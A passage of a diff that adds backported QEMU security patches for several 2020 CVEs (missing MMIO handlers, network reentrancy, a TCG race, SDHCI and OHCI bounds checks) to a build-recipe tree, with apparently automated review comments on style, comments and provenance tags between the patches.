+
+Add ppc-parity mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-5-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/f867cebaedbc9c43189f102e4cdfdff05e88df7f]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/prep_systemio.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/ppc/prep_systemio.c b/hw/ppc/prep_systemio.c
+index 4e48ef2..b2bd783 100644
+--- a/hw/ppc/prep_systemio.c
++++ b/hw/ppc/prep_systemio.c
+@@ -23,6 +23,7 @@
+ */
+
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "hw/irq.h"
+ #include "hw/isa/isa.h"
+ #include "hw/qdev-properties.h"
+@@ -235,8 +236,15 @@ static uint64_t ppc_parity_error_readl(void *opaque, hwaddr addr,
+ return val;
+ }
+
++static void ppc_parity_error_writel(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps ppc_parity_error_ops = {
+ .read = ppc_parity_error_readl,
++ .write = ppc_parity_error_writel,
+ .valid = {
+ .min_access_size = 4,
+ .max_access_size = 4,
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
new file mode 100644
index 0000000000..49c6c5e3e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
@@ -0,0 +1,53 @@
+From b5bf601f364e1a14ca4c3276f88dfec024acf613 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:29 +0530
+Subject: [PATCH] nvram: add nrf51_soc flash read method
+
+Add nrf51_soc mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-6-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b5bf601f364e1a14ca4c3276f88dfec024acf613 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/nvram/nrf51_nvm.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/hw/nvram/nrf51_nvm.c b/hw/nvram/nrf51_nvm.c
+index f2283c1..7b3460d 100644
+--- a/hw/nvram/nrf51_nvm.c
++++ b/hw/nvram/nrf51_nvm.c
+@@ -273,6 +273,15 @@ static const MemoryRegionOps io_ops = {
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
++static uint64_t flash_read(void *opaque, hwaddr offset, unsigned size)
++{
++ /*
++ * This is a rom_device MemoryRegion which is always in
++ * romd_mode (we never put it in MMIO mode), so reads always
++ * go directly to RAM and never come here.
++ */
++ g_assert_not_reached();
++}
+
+ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+ unsigned int size)
+@@ -300,6 +309,7 @@ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+
+
+ static const MemoryRegionOps flash_ops = {
++ .read = flash_read,
+ .write = flash_write,
+ .valid.min_access_size = 4,
+ .valid.max_access_size = 4,
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
new file mode 100644
index 0000000000..115be68295
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
@@ -0,0 +1,61 @@
+Backport of:
+
+From 921604e175b8ec06c39503310e7b3ec1e3eafe9e Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:30 +0530
+Subject: [PATCH] spapr_pci: add spapr msi read method
+
+Add spapr msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-7-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-6.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/921604e175b8ec06c39503310e7b3ec1e3eafe9e]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/spapr_pci.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+--- a/hw/ppc/spapr_pci.c
++++ b/hw/ppc/spapr_pci.c
+@@ -52,6 +52,7 @@
+ #include "sysemu/kvm.h"
+ #include "sysemu/hostmem.h"
+ #include "sysemu/numa.h"
++#include "qemu/log.h"
+
+ /* Copied from the kernel arch/powerpc/platforms/pseries/msi.c */
+ #define RTAS_QUERY_FN 0
+@@ -738,6 +739,12 @@ static PCIINTxRoute spapr_route_intx_pin
+ return route;
+ }
+
++static uint64_t spapr_msi_read(void *opaque, hwaddr addr, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++ return 0;
++}
++
+ /*
+ * MSI/MSIX memory region implementation.
+ * The handler handles both MSI and MSIX.
+@@ -755,8 +762,11 @@ static void spapr_msi_write(void *opaque
+ }
+
+ static const MemoryRegionOps spapr_msi_ops = {
+- /* There is no .read as the read result is undefined by PCI spec */
+- .read = NULL,
++ /*
++ * .read result is undefined by PCI spec.
++ * define .read method to avoid assert failure in memory_region_init_io
++ */
++ .read = spapr_msi_read,
+ .write = spapr_msi_write,
+ .endianness = DEVICE_LITTLE_ENDIAN
+ };
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
new file mode 100644
index 0000000000..7d8ec32251
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-7.patch
@@ -0,0 +1,50 @@
+From 2c9fb3b784000c1df32231e1c2464bb2e3fc4620 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:31 +0530
+Subject: [PATCH] tz-ppc: add dummy read/write methods
+
+Add tz-ppc-dummy mmio read/write methods to avoid assert failure
+during initialisation.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-8-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-7.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/2c9fb3b784000c1df32231e1c2464bb2e3fc4620 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/tz-ppc.c | 14 ++++++++++++++
+ 1 file changed, 14 insertions(+)
+
+diff --git a/hw/misc/tz-ppc.c b/hw/misc/tz-ppc.c
+index 6431257..36495c6 100644
+--- a/hw/misc/tz-ppc.c
++++ b/hw/misc/tz-ppc.c
+@@ -196,7 +196,21 @@ static bool tz_ppc_dummy_accepts(void *opaque, hwaddr addr,
+ g_assert_not_reached();
+ }
+
++static uint64_t tz_ppc_dummy_read(void *opaque, hwaddr addr, unsigned size)
++{
++ g_assert_not_reached();
++}
++
++static void tz_ppc_dummy_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ g_assert_not_reached();
++}
++
+ static const MemoryRegionOps tz_ppc_dummy_ops = {
++ /* define r/w methods to avoid assert failure in memory_region_init_io */
++ .read = tz_ppc_dummy_read,
++ .write = tz_ppc_dummy_write,
+ .valid.accepts = tz_ppc_dummy_accepts,
+ };
+
+--
+1.8.3.1
+
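Review bot: `tz_ppc_dummy_read` and `tz_ppc_dummy_write` abort the process via `g_assert_not_reached()` but carry no comment explaining why a guest access can never reach them, unlike `flash_read` in the CVE-2020-15469-5 patch. Judging by the context line, `tz_ppc_dummy_accepts` asserts as well, so the safety of all three rests on an invariant established outside this hunk. Once that invariant has been confirmed, I would add a comment along the lines of `/* never called: this region is not expected to receive accesses (see tz_ppc_dummy_accepts) */`. The confirmation matters because an assertion reachable from the guest would terminate the host-side QEMU process.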
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
new file mode 100644
index 0000000000..7857ba266e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-8.patch
@@ -0,0 +1,44 @@
+From 735754aaa15a6ed46db51fd731e88331c446ea54 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:32 +0530
+Subject: [PATCH] imx7-ccm: add digprog mmio write method
+
+Add digprog mmio write method to avoid assert failure during
+initialisation.
+
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-9-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-8.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/735754aaa15a6ed46db51fd731e88331c446ea54]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/misc/imx7_ccm.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/misc/imx7_ccm.c b/hw/misc/imx7_ccm.c
+index 02fc1ae..075159e 100644
+--- a/hw/misc/imx7_ccm.c
++++ b/hw/misc/imx7_ccm.c
+@@ -131,8 +131,16 @@ static const struct MemoryRegionOps imx7_set_clr_tog_ops = {
+ },
+ };
+
++static void imx7_digprog_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "Guest write to read-only ANALOG_DIGPROG register\n");
++}
++
+ static const struct MemoryRegionOps imx7_digprog_ops = {
+ .read = imx7_set_clr_tog_read,
++ .write = imx7_digprog_write,
+ .endianness = DEVICE_NATIVE_ENDIAN,
+ .impl = {
+ .min_access_size = 4,
+--
+1.8.3.1
+
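Review bot: Unlike the -1, -2, -3, -4 and -6 patches of this series, this one calls `qemu_log_mask()` in `imx7_digprog_write` without adding `#include "qemu/log.h"`. The include block of hw/misc/imx7_ccm.c is outside the hunk, so confirm the header is already pulled in for the QEMU version this recipe builds. The log message would also be more useful for triage with the written value, e.g. `"%s: guest write 0x%" PRIx64 " to read-only ANALOG_DIGPROG register\n"` with `__func__, data`.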
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
new file mode 100644
index 0000000000..0f43adeea8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15859.patch
@@ -0,0 +1,39 @@
+From 22dc8663d9fc7baa22100544c600b6285a63c7a3 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 22 Jul 2020 16:57:46 +0800
+Subject: [PATCH] net: forbid the reentrant RX
+
+The memory API allows DMA into NIC's MMIO area. This means the NIC's
+RX routine must be reentrant. Instead of auditing all the NIC, we can
+simply detect the reentrancy and return early. The queue->delivering
+is set and cleared by qemu_net_queue_deliver() for other queue helpers
+to know whether the delivering in on going (NIC's receive is being
+called). We can check it and return early in qemu_net_queue_flush() to
+forbid reentrant RX.
+
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+CVE: CVE-2020-15859
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/ubuntu/CVE-2020-15859.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/22dc8663d9fc7baa22100544c600b6285a63c7a3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ net/queue.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/net/queue.c b/net/queue.c
+index 0164727..19e32c8 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -250,6 +250,9 @@ void qemu_net_queue_purge(NetQueue *queue, NetClientState *from)
+
+ bool qemu_net_queue_flush(NetQueue *queue)
+ {
++ if (queue->delivering)
++ return false;
++
+ while (!QTAILQ_EMPTY(&queue->packets)) {
+ NetPacket *packet;
+ int ret;
+--
+1.8.3.1
+
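Review bot: The reentrancy guard added at the top of `qemu_net_queue_flush()` has no comment, and it returns a bare `false`, which is presumably also the function's ordinary "not fully flushed" result (the rest of the body is outside the hunk). A reader of net/queue.c then cannot tell a refused reentrant flush from a receiver that simply could not take more packets. I would add `/* Reentrant call from a NIC receive path (DMA into its own MMIO): leave the packets queued for the outer delivery. */` above the check. The unbraced `if` also departs from QEMU's always-brace style, but since this is a verbatim backport both points are better raised upstream than changed locally.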
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
new file mode 100644
index 0000000000..e0a27331a8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-24165.patch
@@ -0,0 +1,94 @@
+CVE: CVE-2020-24165
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/886cc68943ebe8cf7e5f970be33459f95068a441 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 886cc68943ebe8cf7e5f970be33459f95068a441 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Alex=20Benn=C3=A9e?= <alex.bennee@linaro.org>
+Date: Fri, 14 Feb 2020 14:49:52 +0000
+Subject: [PATCH] accel/tcg: fix race in cpu_exec_step_atomic (bug 1863025)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The bug describes a race whereby cpu_exec_step_atomic can acquire a TB
+which is invalidated by a tb_flush before we execute it. This doesn't
+affect the other cpu_exec modes as a tb_flush by it's nature can only
+occur on a quiescent system. The race was described as:
+
+ B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+ B3. tcg_tb_alloc obtains a new TB
+
+ C3. TB obtained with tb_lookup__cpu_state or tb_gen_code
+ (same TB as B2)
+
+ A3. start_exclusive critical section entered
+ A4. do_tb_flush is called, TB memory freed/re-allocated
+ A5. end_exclusive exits critical section
+
+ B2. tcg_cpu_exec => cpu_exec => tb_find => tb_gen_code
+ B3. tcg_tb_alloc reallocates TB from B2
+
+ C4. start_exclusive critical section entered
+ C5. cpu_tb_exec executes the TB code that was free in A4
+
+The simplest fix is to widen the exclusive period to include the TB
+lookup. As a result we can drop the complication of checking we are in
+the exclusive region before we end it.
+
+Cc: Yifan <me@yifanlu.com>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1863025
+Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
+Reviewed-by: Richard Henderson <richard.henderson@linaro.org>
+Signed-off-by: Alex Bennée <alex.bennee@linaro.org>
+Message-Id: <20200214144952.15502-1-alex.bennee@linaro.org>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+---
+ accel/tcg/cpu-exec.c | 21 +++++++++++----------
+ 1 file changed, 11 insertions(+), 10 deletions(-)
+
+diff --git a/accel/tcg/cpu-exec.c b/accel/tcg/cpu-exec.c
+index 2560c90eec79..d95c4848a47b 100644
+--- a/accel/tcg/cpu-exec.c
++++ b/accel/tcg/cpu-exec.c
+@@ -240,6 +240,8 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ uint32_t cf_mask = cflags & CF_HASH_MASK;
+
+ if (sigsetjmp(cpu->jmp_env, 0) == 0) {
++ start_exclusive();
++
+ tb = tb_lookup__cpu_state(cpu, &pc, &cs_base, &flags, cf_mask);
+ if (tb == NULL) {
+ mmap_lock();
+@@ -247,8 +249,6 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ mmap_unlock();
+ }
+
+- start_exclusive();
+-
+ /* Since we got here, we know that parallel_cpus must be true. */
+ parallel_cpus = false;
+ cc->cpu_exec_enter(cpu);
+@@ -271,14 +271,15 @@ void cpu_exec_step_atomic(CPUState *cpu)
+ qemu_plugin_disable_mem_helpers(cpu);
+ }
+
+- if (cpu_in_exclusive_context(cpu)) {
+- /* We might longjump out of either the codegen or the
+- * execution, so must make sure we only end the exclusive
+- * region if we started it.
+- */
+- parallel_cpus = true;
+- end_exclusive();
+- }
++
++ /*
++ * As we start the exclusive region before codegen we must still
++ * be in the region if we longjump out of either the codegen or
++ * the execution.
++ */
++ g_assert(cpu_in_exclusive_context(cpu));
++ parallel_cpus = true;
++ end_exclusive();
+ }
+
+ struct tb_desc {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
new file mode 100644
index 0000000000..be19256cef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25085.patch
@@ -0,0 +1,46 @@
+From dfba99f17feb6d4a129da19d38df1bcd8579d1c3 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Tue, 1 Sep 2020 15:22:06 +0200
+Subject: [PATCH] hw/sd/sdhci: Fix DMA Transfer Block Size field
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The 'Transfer Block Size' field is 12-bit wide.
+
+See section '2.2.2. Block Size Register (Offset 004h)' in datasheet.
+
+Two different bug reproducer available:
+- https://bugs.launchpad.net/qemu/+bug/1892960
+- https://ruhr-uni-bochum.sciebo.de/s/NNWP2GfwzYKeKwE?path=%2Fsdhci_oob_write1
+
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Fixes: d7dfca0807a ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200901140411.112150-3-f4bug@amsat.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25085
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/sd/sdhci.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/sd/sdhci.c
+===================================================================
+--- qemu-4.2.0.orig/hw/sd/sdhci.c
++++ qemu-4.2.0/hw/sd/sdhci.c
+@@ -1129,7 +1129,7 @@ sdhci_write(void *opaque, hwaddr offset,
+ break;
+ case SDHC_BLKSIZE:
+ if (!TRANSFERRING_DATA(s->prnsts)) {
+- MASKED_WRITE(s->blksize, mask, value);
++ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+ }
+
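Review bot: The `Upstream-Status: Backport` tag in this patch header gives no upstream URL or commit, so the only link to the origin is the hash on the mbox `From` line. The same bare tag appears in CVE-2020-25624_1.patch, CVE-2020-25624_2.patch, CVE-2020-25625.patch, CVE-2020-28916.patch and CVE-2020-29443.patch in this commit, while the patches imported via Ubuntu cite both the import source and the upstream commit. For auditability I would write it as `Upstream-Status: Backport [<upstream commit URL>]` in each, so a reviewer can diff the backport against the original without guessing the repository. This patch is also in quilt `Index:` form against qemu-4.2.0, so any context adjustment made while backporting deserves a line in the header.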
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
new file mode 100644
index 0000000000..a46b5be193
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_1.patch
@@ -0,0 +1,87 @@
+From fbec359e9279ce78908b9f2af2c264e7448336af Mon Sep 17 00:00:00 2001
+From: Guenter Roeck <linux@roeck-us.net>
+Date: Mon, 17 Feb 2020 12:48:10 -0800
+Subject: [PATCH] hw: usb: hcd-ohci: Move OHCISysBusState and TYPE_SYSBUS_OHCI
+ to include file
+
+We need to be able to use OHCISysBusState outside hcd-ohci.c, so move it
+to its include file.
+
+Reviewed-by: Gerd Hoffmann <kraxel@redhat.com>
+Signed-off-by: Guenter Roeck <linux@roeck-us.net>
+Tested-by: Niek Linnenbank <nieklinnenbank@gmail.com>
+Message-id: 20200217204812.9857-2-linux@roeck-us.net
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 15 ---------------
+ hw/usb/hcd-ohci.h | 16 ++++++++++++++++
+ 2 files changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 8a94bd004a..1e6e85e86a 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -1870,21 +1870,6 @@ void ohci_sysbus_die(struct OHCIState *ohci)
+ ohci_bus_stop(ohci);
+ }
+
+-#define TYPE_SYSBUS_OHCI "sysbus-ohci"
+-#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
+-
+-typedef struct {
+- /*< private >*/
+- SysBusDevice parent_obj;
+- /*< public >*/
+-
+- OHCIState ohci;
+- char *masterbus;
+- uint32_t num_ports;
+- uint32_t firstport;
+- dma_addr_t dma_offset;
+-} OHCISysBusState;
+-
+ static void ohci_realize_pxa(DeviceState *dev, Error **errp)
+ {
+ OHCISysBusState *s = SYSBUS_OHCI(dev);
+diff --git a/hw/usb/hcd-ohci.h b/hw/usb/hcd-ohci.h
+index 16e3f1e13a..5c8819aedf 100644
+--- a/hw/usb/hcd-ohci.h
++++ b/hw/usb/hcd-ohci.h
+@@ -22,6 +22,7 @@
+ #define HCD_OHCI_H
+
+ #include "sysemu/dma.h"
++#include "hw/usb.h"
+
+ /* Number of Downstream Ports on the root hub: */
+ #define OHCI_MAX_PORTS 15
+@@ -90,6 +91,21 @@ typedef struct OHCIState {
+ void (*ohci_die)(struct OHCIState *ohci);
+ } OHCIState;
+
++#define TYPE_SYSBUS_OHCI "sysbus-ohci"
++#define SYSBUS_OHCI(obj) OBJECT_CHECK(OHCISysBusState, (obj), TYPE_SYSBUS_OHCI)
++
++typedef struct {
++ /*< private >*/
++ SysBusDevice parent_obj;
++ /*< public >*/
++
++ OHCIState ohci;
++ char *masterbus;
++ uint32_t num_ports;
++ uint32_t firstport;
++ dma_addr_t dma_offset;
++} OHCISysBusState;
++
+ extern const VMStateDescription vmstate_ohci_state;
+
+ void usb_ohci_init(OHCIState *ohci, DeviceState *dev, uint32_t num_ports,
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
new file mode 100644
index 0000000000..8c1275b2f4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25624_2.patch
@@ -0,0 +1,101 @@
+From 1328fe0c32d5474604105b8105310e944976b058 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:58 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check len and frame_number variables
+
+While servicing the OHCI transfer descriptors(TD), OHCI host
+controller derives variables 'start_addr', 'end_addr', 'len'
+etc. from values supplied by the host controller driver.
+Host controller driver may supply values such that using
+above variables leads to out-of-bounds access issues.
+Add checks to avoid them.
+
+AddressSanitizer: stack-buffer-overflow on address 0x7ffd53af76a0
+ READ of size 2 at 0x7ffd53af76a0 thread T0
+ #0 ohci_service_iso_td ../hw/usb/hcd-ohci.c:734
+ #1 ohci_service_ed_list ../hw/usb/hcd-ohci.c:1180
+ #2 ohci_process_lists ../hw/usb/hcd-ohci.c:1214
+ #3 ohci_frame_boundary ../hw/usb/hcd-ohci.c:1257
+ #4 timerlist_run_timers ../util/qemu-timer.c:572
+ #5 qemu_clock_run_timers ../util/qemu-timer.c:586
+ #6 qemu_clock_run_all_timers ../util/qemu-timer.c:672
+ #7 main_loop_wait ../util/main-loop.c:527
+ #8 qemu_main_loop ../softmmu/vl.c:1676
+ #9 main ../softmmu/main.c:50
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Reported-by: Yongkang Jia <j_kangel@163.com>
+Reported-by: Yi Ren <yunye.ry@alibaba-inc.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-id: 20200915182259.68522-2-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25624 patch #2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 24 ++++++++++++++++++++++--
+ 1 file changed, 22 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 1e6e85e86a..9dc59101f9 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -731,7 +731,11 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ }
+
+ start_offset = iso_td.offset[relative_frame_number];
+- next_offset = iso_td.offset[relative_frame_number + 1];
++ if (relative_frame_number < frame_count) {
++ next_offset = iso_td.offset[relative_frame_number + 1];
++ } else {
++ next_offset = iso_td.be;
++ }
+
+ if (!(OHCI_BM(start_offset, TD_PSW_CC) & 0xe) ||
+ ((relative_frame_number < frame_count) &&
+@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ }
+ } else {
+ /* Last packet in the ISO TD */
+- end_addr = iso_td.be;
++ end_addr = next_offset;
++ }
++
++ if (start_addr > end_addr) {
++ trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr);
++ return 1;
+ }
+
+ if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) {
+@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ } else {
+ len = end_addr - start_addr + 1;
+ }
++ if (len > sizeof(ohci->usb_buf)) {
++ len = sizeof(ohci->usb_buf);
++ }
+
+ if (len && dir != OHCI_TD_DIR_IN) {
+ if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len,
+@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed)
+ if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) {
+ len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff);
+ } else {
++ if (td.cbp > td.be) {
++ trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be);
++ ohci_die(ohci);
++ return 1;
++ }
+ len = (td.be - td.cbp) + 1;
+ }
++ if (len > sizeof(ohci->usb_buf)) {
++ len = sizeof(ohci->usb_buf);
++ }
+
+ pktlen = len;
+ if (len && dir != OHCI_TD_DIR_IN) {
+--
+2.25.1
+
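Review bot: In the `ohci_service_td()` hunk the new `td.cbp > td.be` rejection logs through `trace_usb_ohci_iso_td_bad_cc_overrun`, an isochronous-TD trace event, so a malformed general TD will show up in traces as an ISO TD problem. The two paths also differ in severity without saying why: the general-TD check calls `ohci_die(ohci)` before `return 1`, whereas the `start_addr > end_addr` check in `ohci_service_iso_td()` only returns. Both `len > sizeof(ohci->usb_buf)` clamps truncate silently; a comment such as `/* TD bounds come from the guest driver: never copy more than usb_buf holds */` above each would record that the value is guest-controlled. Both functions start and end outside the hunks shown, and since this is a backport any code change belongs upstream first.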
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
new file mode 100644
index 0000000000..374d7c4562
--- /dev/null
